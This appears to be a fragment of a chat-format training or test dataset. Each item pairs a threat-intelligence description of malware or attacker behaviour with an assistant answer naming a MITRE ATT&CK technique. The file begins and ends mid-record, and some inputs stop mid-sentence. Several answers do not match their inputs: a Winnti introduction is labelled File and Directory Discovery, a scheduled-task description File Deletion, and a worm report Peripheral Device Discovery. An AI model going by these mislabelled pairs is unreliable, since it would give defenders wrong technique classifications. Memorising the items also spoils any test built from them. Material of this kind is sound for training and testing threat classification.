- "content": "Windows Management Instrumentation WMI is an administrative framework that is built into every version of Windows since 2000"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass has searched compromised systems for folders of interest including those related to HR, audit and expense, and meeting memos."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Diavol can spread throughout a network via SMB prior to encryption."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The arp.exe command is used to display and modify entries in the Address Resolution Protocol (ARP) cache. Adversaries may attempt to use the command to discover remote systems they could compromise"
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used the Office Test persistence mechanism within Microsoft Office by adding the Registry key HKCU\\Software\\Microsoft\\Office test\\Special\\Perf to execute code."
- },
- {
- "role": "assistant",
- "content": "T1137 - Office Application Startup"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "actors used legitimate credentials of banking employees to perform operations that sent them millions of dollars."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FunnyDream can send compressed and obfuscated packets to C2."
- },
- {
- "role": "assistant",
- "content": "T1001 - Data Obfuscation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "executes ipconfig /all after initial communication is made to the remote server."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can conduct brute force attacks to capture credentials."
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 used encoded PowerShell commands to install Cobalt Strike on compromised systems. The attacker made use of Cobalt Strike’s “psexec” lateral movement command to create a Windows service named with a random 16-character string on the target system and execute encoded PowerShell. In some cases, the encoded PowerShell commands were used to download and execute content hosted on the paste site hxxps://pastebin[.]com"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service', 'T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aside from security programs and other programs used daily that can be used to profile its targets, the DUBNIUM malware also checks for various program analysis tools including Pin and DynamoRIO. It also checks for a virtual machine environment. If some of these are detected, it quits its execution. Overall, the malware is very cautious and deterministic in running its main code"
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "3PARA RAT has a command to retrieve metadata for files on disk as well as a command to list the current working directory."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkWatchman can use TLS to encrypt its C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ObliqueRAT has the ability to recursively enumerate files on an infected endpoint."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file “gracious_truth.jpg”, which likely has a fake JPG header. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware. We believe that this was used to execute a customized Cobalt Strike BEACON"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information', 'T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mongall can establish persistence with the auto start function including using the value `EverNoteTrayUService`."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Finally, the payloads were almost never repeated. The threat actor made sure that each payload had a unique hash, and some payloads were packed using different types of packers, both known and custom"
- },
- {
- "role": "assistant",
- "content": "T1027.005 - Indicator Removal from Tools', 'T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can query for information contained within the Windows Registry."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SDBbot has the ability to determine the domain name and whether a proxy is configured on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This step establishes the persistence of the malware across reboots on the endpoint - Once the decrypted MZ marker is written to the Startup folder, the 2.hwp is deleted from the endpoint"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Its main functions are: Brute-force using a pre-defined list of usernames and passwords in an attempt to login to Admin panels"
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the course of our research we uncovered the activity of a hacking group which has Chinese origins. This group was named “Winnti"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used the sticky-keys technique to bypass the RDP login screen on remote systems during intrusions."
- },
- {
- "role": "assistant",
- "content": "T1546.008 - Event Triggered Execution: Accessibility Features"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. Similarly, the VBA code then writes batch code to another text file - Audio.txt. The content of both files is shown in the appendix section of this report. Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. In the case of file 8892279f3. the remote location is http://185.203.119[.]184/Dropbox/request. and only continues if the file exists. 2) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. 3) Similarly, the VBA code then writes batch code to another text file - Audio.txt. 6) Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. In the case of file 8892279f3. the remote location is http://185.203.119[.]184/Dropbox/request"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Next, a Cobalt Strike binary was dropped on the endpoint as a .dll file and executed by rundll32.exe. With that, the intrusion began spreading laterally via Cobalt Strike. The operators used Windows Management Instrumentation (WMI) in their lateral movement attempt. WMI spawned cmd.exe, which subsequently spawned PowerShell with an encoded command line. This encoded PowerShell creates another Cobalt Strike Beacon. We’ve found that looking for encoded PowerShell is a great way to catch this specific evil and a lot of other evil, too. In this incident, we saw a command line that began with"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TSCookie can multiple protocols including HTTP and HTTPS in communication with command and control (C2) servers."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A scheduled task is also generated to maintain persistence of the payload"
- },
- {
- "role": "assistant",
- "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbanak has named malware \"svchost.exe,\" which is the name of the Windows shared service host program."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can gather browser usernames and passwords."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Although tracking threats like Winnti involves old-fashioned investigative work, Microsoft Threat Intelligence analysts take advantage of machine learning to work at scale. When attackers used Winnti to maintain access to web servers, they hid the implant in plain sight by masquerading it as a trusted, legitimate file"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FYAnti can download additional payloads to a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can create hidden system directories."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly dropped and executed Hydra, a password cracker."
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The first dropped file, doc.exe, contains the CVE-2014-4113 exploit and then attempts to execute test.exe with the elevated privileges"
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LookBack’s C2 proxy tool sends data to a C2 server over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After encryption, Diavol will capture the desktop background window, set the background color to black, and change the desktop wallpaper to a newly created bitmap image with the text “All your files are encrypted! For more information see “README-FOR-DECRYPT.txt\"."
- },
- {
- "role": "assistant",
- "content": "T1491.001 - Defacement: Internal Defacement"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In a new sample of the REvil ransomware discovered by MalwareHunterTeam, a new -smode command-line argument was added that forces the computer to reboot into Safe Mode before encrypting a device"
- },
- {
- "role": "assistant",
- "content": "T1562.009 - Impair Defenses: Safe Boot Mode"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can use obfuscated and encoded scripts; it has also hidden code within Excel spreadsheets by turning the font color to white and splitting it across multiple cells."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "copies itself to an .exe file with a filename that is likely intended to imitate Norton Antivirus but has several letters reversed (e.g. notron.exe)."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After copying itself to a DLL file, a variant of calls the DLL file using rundll32.exe."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One significant change between DEATHRANSOM and FIVEHANDS is the use of a memory-only dropper, which upon execution, expects a command line switch of -key followed by the key value necessary to perform decryption of its payload. The payload is stored and encrypted with AES-128 using an IV of “85471kayecaxaubv”. The decrypted FIVEHANDS payload is immediately executed after decryption. To date, Mandiant has only observed encrypted droppers with a common imphash of 8517cf209c905e801241690648f36a97"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoisonIvy captures window titles."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PlugX decompresses and decrypts itself using the Microsoft API call RtlDecompressBuffer."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 has used Kerberoasting for credential access and to enable lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ADVSTORESHELL can perform keylogging."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Netwalker can terminate system processes and services, some of which relate to backup software."
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aria-body has the ability to capture screenshots on compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "checks the running processes for evidence it may be running in a sandbox environment. It specifically enumerates processes for Wireshark and Sysinternals."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM tries to add a scheduled task to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can check for the presence of network sniffers, AV, and BitDefender firewall."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Babuk has the ability to check running processes on a targeted system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The SodomMain module is LookBack malware’s remote access Trojan module that can send and receive numerous commands indicative of its function as a RAT. The malware is delivered within the encoded data that is received by the SodomNormal module as part of its initial beacon response. It then runs within the SodomNormal module and uses its “send_data” function for C&C communications"
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Case in point: Last week, we came across a worm (detected by Trend Micro as Worm.Win32.BLADABINDI.AA) that propagates through removable drives and installs a fileless version of the BLADABINDI backdoor"
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SchTasks.exe performs operations similar to those in Scheduled Tasks in Control Panel. You can use either tool to create, delete, configure, or display scheduled tasks. The user must be a member of the Administrators group on the computer that the command affects. To verify that a scheduled task ran or to find out why a scheduled task did not run, see the Task Scheduler service transaction log, Systemroot\\SchedLgU.txt. This log records attempted runs initiated by all tools that use the service, including Scheduled Tasks and SchTasks.exe. On rare occasions, task files become corrupted. Corrupted tasks do not run. When you try to perform an operation on corrupted tasks, SchTasks.exe displays the following error message: ERROR: The data is invalid. You cannot recover corrupted tasks. To restore the task scheduling features of the system, use SchTasks.exe or Scheduled Tasks to delete the tasks from the system and reschedule them"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacSpy captures keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WellMess can execute PowerShell scripts received from C2."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This extreme level of variance was also applied to non-executable entities, such as WMI persistence filter name, WMI filter query, passwords used for 7-zip archives, and names of output log files. Camouflage and blending into the environment. ADFIND legit tool) were always renamed and placed in folders that mimicked existing programs and files already present on a machine. This blending was not just used for files, but for other elements. For example, WMI persistence filters were created with names and queries matching other scripts present in affected organizations. The firewall rules were also methodically removed after the network reconnaissance was completed. Lateral movement activities were never executed without preparation. To increase the likelihood that their activities remain undetected, the attackers first enumerated remote processes and services running on the target host and decided to move laterally only after disabling certain security services"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "executes cmd.exe to provide a reverse shell to adversaries."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 used a tool called CLASSFON to covertly proxy network communications."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Version 2 Rather than using the host ID as the key, this version uses a random XOR key between 32 and 64 bytes in length that is generated for each session"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PittyTiger has obtained and used tools such as Mimikatz and gsecdump."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QUADAGENT used the PowerShell filenames \"Office365DCOMCheck.ps1\" and \"SystemDiskClean.ps1\"."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FALLCHILL encrypts C2 data with RC4 encryption."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The execution of the Powershell that is passed to IEX by the Stage 1 Word document is where we begin to observe several interesting activities occurring on an infected system. One is used to determine whether or not to achieve persistence for the next stage of the infection process on the target system. If persistence is selected the other switch defines whether or not the Stage 3 code should be executed once it is staged. If the option to achieve persistence was selected when the 'pre_logic' function was called, the function will then query the infected system to determine how to best achieve persistence. Depending on the access rights of the user account within which the malware is operating, the malware will then query registry paths that are commonly used by malware to achieve persistence. If operating under an account with Administrator access to the system the script will query and set"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation CuckooBees, the threat actors used compromised domain administrator credentials as part of their lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1078.002 - Domain Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obtains the IP address from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses PowerShell scripts for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "More_eggs has used an RC4-based encryption method for its C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Most of the initial payloads in these campaigns are signed with valid certificates to evade security tools. They abuse the relative trust that is given to signed binaries to avoid detection"
- },
- {
- "role": "assistant",
